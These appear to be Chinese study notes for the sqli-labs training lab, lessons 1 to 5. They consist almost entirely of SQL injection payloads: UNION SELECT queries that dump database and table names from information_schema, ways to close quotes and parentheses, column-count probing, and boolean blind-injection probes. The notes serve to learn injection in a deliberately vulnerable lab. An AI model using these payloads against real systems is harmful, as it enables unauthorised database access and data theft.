库名 ?id=-1' union select 1,2,group_concat(schema_name)from information_schema.schemata--+
表名 -1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
less-2
去掉‘,其余通less1
1 2 3 4 5
库名 ?id=-1 union select 1,2,group_concat(schema_name)from information_schema.schemata--+
表名 -1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
less-3
源代码
1
Select login_name, select password from table where id= ('our input here')
所以加上圆括号即可
1
-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
less-4
输入” 出现You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") LIMIT 0,1' at line 1
判断闭合需要”)
1
-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--
less-5
单引号报错,双引号不报错
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
探测列数 1' order by 4--+
盲注先探测数据库长度 id=1' and (select length(database()) = 数字)--+
mysql> select length(database())=4; +----------------------+ | length(database())=4 | +----------------------+ | 1 | +----------------------+ 1 row in set (0.00 sec)
判断内容 1' and (select mid(database(),字母,1)=' 第几位 ')--+